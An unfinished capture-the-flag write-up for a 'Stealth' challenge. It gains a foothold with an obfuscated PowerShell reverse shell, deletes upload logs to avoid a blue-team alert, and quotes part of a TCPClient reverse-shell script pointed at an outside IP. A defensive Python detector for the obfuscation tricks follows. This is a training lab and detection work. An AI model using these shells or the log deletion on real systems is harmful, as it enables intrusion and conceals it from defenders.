Stealth
Challenge: Stealth
We start with an AutoRecon against our target IP.
On the website of the PowerShell script analyser we can upload a file. We use the following tool to create an obfuscated reverse shell: [gh0x0st/Get-ReverseShell: A solution to create obfuscated reverse shells for PowerShell](https://github.com/gh0x0st/Get-ReverseShell), and we have access to the machine!
```
listening on [any] 4444 ...
10.10.79.11: inverse host lookup failed: Unknown host
connect to [10.11.146.206] from (UNKNOWN) [10.10.79.11] 49992
ls

    Directory: C:\Users\evader\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/29/2023   3:11 PM                Task
```
And we get an encoded flag:
-----BEGIN CERTIFICATE-----
WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDov
LzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5w
aHA=
-----END CERTIFICATE-----
We decode from base64 and we find
So we surf to this particular address. Here we are met by the following:
Hey, seems like you have uploaded invalid file. Blue team has been alerted.
Hint: Maybe removing the logs files for file uploads can help?
We now browse around this machine again and look for the log file. We find and delete it here:
After this we have our user flag. Now we need to gain root. We find the following file:
```
PS C:\xampp\htdocs\Uploads> dir

    Directory: C:\xampp\htdocs\Uploads

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/1/2023   5:10 PM            132 hello.ps1
-a----         8/17/2023   4:58 AM              0 index.php
-a----         11/8/2025  10:56 PM           2728 obfuscated.ps1
-a----         11/8/2025  11:02 PM             12 qc
-a----          9/4/2023   3:18 PM            771 vulnerable.ps1
```
It seems we can edit vulnerable.ps1 and use it to gain a root shell. Let's try to edit the file and launch it.
```powershell
Set-Alias -Name nothingHere -Value iex
$BT = New-Object "S`y`stem.Net.Sockets.T`CPCl`ient"('10.10.146.206',3333);
$replace = $BT.GetStream();
[byte[]]$B = 0..(32768*2-1)|%{0};
```
Edit the file to have your own IP and port, then re-upload it to the Windows server.
UNFINISHED
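Seen from the defender's side, the script lines quoted above hide two things a script analyser would match on: the `TCPClient` type name is split with no-op backticks, and `iex` is reached through an alias. The following Python is an added example, not part of the original write-up or of the challenge's analyser; the rule names and the `strip_noop_ticks` and `analyse` functions are assumptions made for illustration.

```python
import re

# Backtick is PowerShell's escape character: before these characters it has a
# meaning (`n, `t, ...), before any other letter or digit it changes nothing.
MEANINGFUL = set("0abefnrtuv")
TICK = re.compile(r"`([A-Za-z0-9])")
ALIAS_CMD = re.compile(r"^\s*(?:set-alias|new-alias|sal|nal)\b(.*)$", re.I)
IEX = re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I)

# Constructed sample: the four script lines quoted in the write-up.
SAMPLE = r'''Set-Alias -Name nothingHere -Value iex
$BT = New-Object "S`y`stem.Net.Sockets.T`CPCl`ient"('10.10.146.206',3333);
$replace = $BT.GetStream();
[byte[]]$B = 0..(32768*2-1)|%{0};'''

def strip_noop_ticks(line):
    """Return (line without no-op backticks, number removed)."""
    removed = 0
    def keep_or_drop(m):
        nonlocal removed
        if m.group(1) in MEANINGFUL:
            return m.group(0)
        removed += 1
        return m.group(1)
    return TICK.sub(keep_or_drop, line), removed

def analyse(script):
    """Return (line_no, rule, detail) findings for a PowerShell script."""
    findings, aliases = [], []
    for no, raw in enumerate(script.splitlines(), 1):
        clean, ticks = strip_noop_ticks(raw)
        if ticks:
            findings.append((no, "noop-backtick", ticks))
        if "net.sockets.tcpclient" in clean.lower():
            hidden = "net.sockets.tcpclient" not in raw.lower()
            findings.append((no, "tcpclient", "obfuscated" if hidden else "plain"))
        cmd = ALIAS_CMD.match(clean)
        if cmd and IEX.search(cmd.group(1)):
            args = cmd.group(1).replace(";", " ").split()
            alias = next((a for a in args if a[0] != "-" and not IEX.fullmatch(a)), None)
            if alias:  # remember the alias so later calls through it are flagged
                aliases.append(re.compile(rf"(?<![\w$.-]){re.escape(alias)}(?![\w-])", re.I))
            findings.append((no, "iex-alias", alias or "?"))
        elif any(p.search(clean) for p in aliases):
            findings.append((no, "iex-alias-use", raw.strip()))
    return findings

if __name__ == "__main__":
    print(*analyse(SAMPLE), sep="\n")
```

The normalisation is for matching only: inside single-quoted PowerShell strings a backtick is a literal character, so the cleaned line is not a faithful rewrite of the script. Alias definitions that appear after a `;` on a shared line are not covered by this line-based check.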